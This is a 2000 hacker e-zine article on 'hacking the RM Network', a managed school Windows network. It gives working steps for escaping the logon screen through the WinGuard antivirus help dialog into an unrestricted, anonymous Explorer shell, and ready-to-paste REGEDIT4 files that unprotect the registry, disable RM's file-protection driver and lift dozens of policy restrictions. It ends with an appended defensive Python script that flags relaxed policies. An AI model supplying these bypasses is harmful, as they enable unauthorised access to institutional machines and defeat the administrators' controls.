    _________   SWAT MAGAZINE ISSUE TWENTY EIGHT   APRIL 2000   __________
   /         \___________________________________________/          \
  /                   Hacking the RM Network part 1                  \
 /                          -: by nEthOoD :-                          \
-----------------------------------------------------------------------

Ok here is article number two comin' your way, i've decided to do the RM Network even though it was done before by syZtem Krash (how can i say it ............it was erm LAME!!!!!!!!!!!). These all work, i've used them, unlike syZtem Krash who probably hasn't touched the RM Network (by the way it was issue 21 the article waz in).

Well anyway here's some exploits and hacks for the RM Network.

The Winguard Trick

Most RM Networks use Dr. Solomon's Winguard Virus Protection. To determine whether the network you are using has WinGuard, you should look in the System Tray for a little picture of a guard. To make sure this is Winguard, double-click on it and it should somewhere say "Dr. Solomon's WinGuard". Now leave this little window open and log off; you should now be at the RM Connect Screen. Use Alt + Tab to get to WinGuard. Now go to Help -> Contents -> Open, go to C:\Windows and type in *.*, which will display all of the files in Windows. Now move along to explorer.exe, right-click on it, and choose Open. Windows Explorer shall now pop up with an unrestricted Shell. Also you will be an anonymous User: if you click on Network on the RM Logoff Screen the Username will be blank.

You may wonder why, when you open other applications in the background and log off, they have disappeared. This is because Dr. Solomon's Winguard is unkillable, so that the protection is maximum. Obviously it isn't just Explorer you can open, so take a look around for any other interesting stuff. One thing though: the RM Connect Box will still be there, and you can't close it. Maybe using WinKill might do the trick, but I'm really not sure.

If your RM Network doesn't have Winguard, or they have used the patch which was released a while ago for this flaw, then turn off file protector and add Notepad to the RunServices registry entry and use that to access the HDD.

Now u have the anonymous login and access to the registry files - (c:\windows\regedit.exe) - i'll give u some things to do that will make your life a hell of a lot easier.

This is exactly how RM Protect and Unprotect the Registry. Here are the files: the first one Protects, and the second one Unprotects.

REGEDIT4

; Protect: registry editing tools disabled
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

REGEDIT4

; Unprotect: registry editing tools allowed
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Once you have unprotected the registry, take a good look around, and you'll find some interesting RM Only DWORD Values, etc. In this manual I will refer back to using the registry quite a lot for different things, so make sure you master registry editing and using the protect and unprotect registry files.

Now the stuff you need to cut and paste to take most of the restrictions off and to unprotect. BTW to turn on all this stuff just change the value of dword:00000000 to dword:00000001.

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:00000000
"NoFileSysPage"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000

Ok to keep the reg kept after bootup, but before you discover this for yourself: you can't keep the user settings (as in a desktop you created and sharing of the machine's HD), but you can keep the settings as in the settings that would allow you to keep RM file protector off.

Anyway this is all for this article. If there is part 2 in this issue read it, if not it may be in the next issue (if F_S puts it in). Anyway have fun and i wish u many good hacks

-:nEThOoD:- of ANtI magazine
http://www.geocities.com/antimag
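
Added example, not part of the original article or any RM tooling: an administrator-side check that parses a REGEDIT4 export (the format of the files listed above) and reports every value under a Policies key that has been set to 0. The function names, the sample export and the rule that 0 means "restriction switched off" are assumptions made for this sketch.

```python
import re

# Assumption (not from the article): a dword of 0 under a Policies key means the
# restriction is switched off, so any such value in an export is worth a look.
POLICY_ROOT = "software\\microsoft\\windows\\currentversion\\policies"
SECTION = re.compile(r"^\[(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')

# Constructed sample export, not taken from a real machine.
SAMPLE = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispSettingsPage"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:0000000
"NoDrives"=dword:00000001
'''

def parse_regedit4(text):
    """Parse REGEDIT4 text into {key_path: {value_name: int}} (dword values only)."""
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln and not ln.startswith(";")]  # drop blanks/comments
    if not lines or lines[0] != "REGEDIT4":
        raise ValueError("not a REGEDIT4 file")
    keys, current = {}, None
    for ln in lines[1:]:
        m = SECTION.match(ln)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = DWORD.match(ln)  # accepts 1-8 hex digits, so a short dword still parses
        if m and current is not None:
            current[m.group(1)] = int(m.group(2), 16)
    return keys

def relaxed_policies(keys):
    """Return sorted (policy_subkey, value_name) pairs whose dword is 0."""
    hits = []
    for path, values in keys.items():
        idx = path.lower().find(POLICY_ROOT)
        if idx == -1:
            continue  # not a Policies key, ignore
        sub = path[idx + len(POLICY_ROOT):].lstrip("\\")
        hits += [(sub, name) for name, value in values.items() if value == 0]
    return sorted(hits)

if __name__ == "__main__":
    for sub, name in relaxed_policies(parse_regedit4(SAMPLE)):
        print(f"policy relaxed: {sub}\\{name} = 0")
```

Run against a periodic export of a station's policy keys, a non-empty result shows which restrictions have been cleared since the baseline was applied.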